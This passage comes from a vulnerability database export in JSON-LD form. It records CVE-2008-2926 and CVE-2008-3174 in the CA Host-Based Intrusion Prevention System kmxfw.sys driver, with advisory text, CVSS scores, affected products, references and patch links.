Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys\nekQdlRjiIYnyp9WEqqGAxQ==\n=ltU4\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-2926"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-33051",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-2926",
"trust": 3.0
},
{
"db": "BID",
"id": "30651",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "31434",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1020659",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1020658",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1020660",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2008-2339",
"trust": 2.5
},
{
"db": "XF",
"id": "44392",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "69034",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "69035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-33051",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68975",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"id": "VAR-200808-0147",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:05:19.831000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "36559",
"trust": 0.8,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559"
},
{
"title": "36559",
"trust": 0.8,
"url": "http://www.ca.com/jp/securityadvisor/vulninfo/Vuln.aspx?id=36559"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/30651"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1020658"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1020659"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1020660"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/31434"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2008/2339"
},
{
"trust": 2.2,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/495397/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44392"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2926"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/44392"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-2926"
},
{
"trust": 0.4,
"url": "http://www.trapkit.de/advisories/tkadv2008-006.txt"
},
{
"trust": 0.4,
"url": "http://www.ca.com"
},
{
"trust": 0.4,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560"
},
{
"trust": 0.3,
"url": "/archive/1/495427"
},
{
"trust": 0.3,
"url": "/archive/1/495397"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2926"
},
{
"trust": 0.1,
"url": "http://www.trapkit.de/advisories/tk-advisories-signature-key.asc"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/18834/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31434/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12660/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16198/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19549/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14434/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solutionresults?aparno=ro00535\u0026actionid=4"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3174"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3174"
},
{
"trust": 0.1,
"url": "http://www.trapkit.de/"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://shop.ca.com/support."
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/redirarticles?reqpage=search\u0026se"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=182496"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-33051"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "VULHUB",
"id": "VHN-33051"
},
{
"date": "2008-08-11T00:00:00",
"db": "BID",
"id": "30651"
},
{
"date": "2010-12-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"date": "2008-08-13T05:43:58",
"db": "PACKETSTORM",
"id": "69035"
},
{
"date": "2008-08-13T01:46:19",
"db": "PACKETSTORM",
"id": "68975"
},
{
"date": "2008-08-13T05:41:53",
"db": "PACKETSTORM",
"id": "69034"
},
{
"date": "2008-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"date": "2008-08-12T23:41:00",
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-33051"
},
{
"date": "2008-08-25T22:25:00",
"db": "BID",
"id": "30651"
},
{
"date": "2010-12-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-002498"
},
{
"date": "2021-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-164"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2008-2926"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "69035"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Host-Based Intrusion Prevention System of kmxfw.sys Driver vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-002498"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-164"
}
],
"trust": 0.6
}
}
VAR-200808-0291
Vulnerability from variot - Updated: 2025-04-10 23:05Unspecified vulnerability in the kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, allows remote attackers to cause a denial of service via unknown vectors, related to "insufficient validation.". (DoS) There is a vulnerability that becomes a condition.Service disruption by a third party (DoS) There is a possibility of being put into a state. Computer Associates products are prone to two vulnerabilities. Attackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. Successful attacks will completely compromise the computer or cause denial-of-service conditions. There is an unknown vulnerability in the kmxfw.sys driver in CA HIPS r8.
2) An unspecified error in the kmxfw.sys driver can be exploited to cause a DoS.
PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Tobias Klein 2) Elazar Broad
ORIGINAL ADVISORY: CA: http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. CA has issued updates to address the vulnerabilities. The first vulnerability, CVE-2008-2926, occurs due to insufficient verification of IOCTL requests by the kmxfw.sys driver. The second vulnerability, CVE-2008-3174, occurs due to insufficient validation by the kmxfw.sys driver. An attacker can make a request that can cause a system crash.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not affected. To ensure that the latest automatic update is installed on your computer, customers can view the Help>About screen in their CA Personal Firewall product and confirm that the engine version number is 1.2.276 or higher. For support information, visit http://shop.ca.com/support.
How to determine if you are affected: 1. Using Windows Explorer, locate the file "kmxfw.sys". By default, the file is located in the "C:\Windows\system32\drivers\" directory. 2. Right click on the file and select Properties. 3. Select the General tab. 4. If the file version is less than indicated in the below table, the installation is vulnerable.
File Name Version Size (bytes) Date kmxfw.sys 6.5.5.18 115,216 March 14, 2008
Workaround: None
References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Host-Based Intrusion Prevention System SDK https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=182496 Solution Document Reference APARs: RO00535 CA Security Response Blog posting: CA Host-Based Intrusion Prevention System SDK kmxfw.sys Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/08/12.aspx Reported By: Tobias Klein (CVE-2008-2926) http://www.trapkit.de/ Elazar Broad (CVE-2008-3174) CVE References: CVE-2008-2926 - CA HIPS kmxfw.sys IOCTL http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2926 CVE-2008-3174 - CA HIPS kmxfw.sys denial of service http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys ekQdlRjiIYnyp9WEqqGAxQ== =ltU4 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0291",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host based intrusion prevention system",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "r8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2007"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2007"
},
{
"model": "personal firewall",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2008"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.6,
"vendor": "computer associates",
"version": "2008"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "r8"
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "personal firewall",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
},
{
"model": "associates personal firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20070"
},
{
"model": "associates host-based intrusion prevention system r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates personal firewall engine",
"scope": "ne",
"trust": 0.3,
"vendor": "computer",
"version": "1.2.276"
}
],
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:host-based_intrusion_prevention_system",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:personal_firewall",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tobias Klein, Elazar Broad",
"sources": [
{
"db": "BID",
"id": "30651"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
],
"trust": 0.9
},
"cve": "CVE-2008-3174",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2008-3174",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-33299",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2008-3174",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2008-3174",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-174",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-33299",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the kmxfw.sys driver in CA Host-Based Intrusion Prevention System (HIPS) r8, as used in CA Internet Security Suite and Personal Firewall, allows remote attackers to cause a denial of service via unknown vectors, related to \"insufficient validation.\". (DoS) There is a vulnerability that becomes a condition.Service disruption by a third party (DoS) There is a possibility of being put into a state. Computer Associates products are prone to two vulnerabilities. \nAttackers may exploit the first vulnerability locally to execute arbitrary code with SYSTEM-level privileges or cause a system crash. Attackers may exploit the second vulnerability remotely to cause denial-of-service conditions. \nSuccessful attacks will completely compromise the computer or cause denial-of-service conditions. There is an unknown vulnerability in the kmxfw.sys driver in CA HIPS r8. \n\n2) An unspecified error in the kmxfw.sys driver can be exploited to\ncause a DoS. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n1) Tobias Klein\n2) Elazar Broad\n\nORIGINAL ADVISORY:\nCA:\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. CA has issued \nupdates to address the vulnerabilities. The first vulnerability, \nCVE-2008-2926, occurs due to insufficient verification of IOCTL \nrequests by the kmxfw.sys driver. The second vulnerability, \nCVE-2008-3174, occurs due to insufficient validation by the \nkmxfw.sys driver. An attacker can make a request that can cause a \nsystem crash. \n\n\nMitigating Factors: None\n\n\nSeverity: CA has given these vulnerabilities a Medium risk rating. CA Personal Firewall Engine 1.2.276 and later are not \naffected. To ensure that the latest automatic update is installed \non your computer, customers can view the Help\u003eAbout screen in \ntheir CA Personal Firewall product and confirm that the engine \nversion number is 1.2.276 or higher. For support information, \nvisit http://shop.ca.com/support. \n\n\nHow to determine if you are affected:\n1. Using Windows Explorer, locate the file \"kmxfw.sys\". By default, \n the file is located in the \"C:\\Windows\\system32\\drivers\\\" directory. \n2. Right click on the file and select Properties. \n3. Select the General tab. \n4. If the file version is less than indicated in the below table, \n the installation is vulnerable. \n\nFile Name Version Size (bytes) Date\nkmxfw.sys 6.5.5.18 115,216 March 14, 2008\n\n\nWorkaround: None\n\n\nReferences (URLs may wrap):\nCA Support:\nhttp://support.ca.com/\nSecurity Notice for\nCA Host-Based Intrusion Prevention System SDK\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=182496\nSolution Document Reference APARs:\nRO00535\nCA Security Response Blog posting:\nCA Host-Based Intrusion Prevention System SDK kmxfw.sys Multiple \n Vulnerabilities\ncommunity.ca.com/blogs/casecurityresponseblog/archive/2008/08/12.aspx\nReported By: \nTobias Klein (CVE-2008-2926)\nhttp://www.trapkit.de/\nElazar Broad (CVE-2008-3174)\nCVE References:\nCVE-2008-2926 - CA HIPS kmxfw.sys IOCTL\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2926\nCVE-2008-3174 - CA HIPS kmxfw.sys denial of service\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3174\nOSVDB References: Pending\nhttp://osvdb.org/\n\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\n\nCustomers who require additional information should contact CA\nTechnical Support at http://support.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your \nfindings to our product security response team. \nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2008 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj4DBQFIoduueSWR3+KUGYURAmmKAJ9FWl5gIZrbrGhg5CZ0NKzw0QE8qQCY+Qys\nekQdlRjiIYnyp9WEqqGAxQ==\n=ltU4\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3174"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-3174",
"trust": 2.9
},
{
"db": "BID",
"id": "30651",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "31434",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1020662",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1020661",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1020663",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-2339",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251",
"trust": 0.8
},
{
"db": "XF",
"id": "44393",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080812 CA HOST-BASED INTRUSION PREVENTION SYSTEM SDK KMXFW.SYS MULTIPLE VULNERABILITIES",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-33299",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68975",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "69034",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
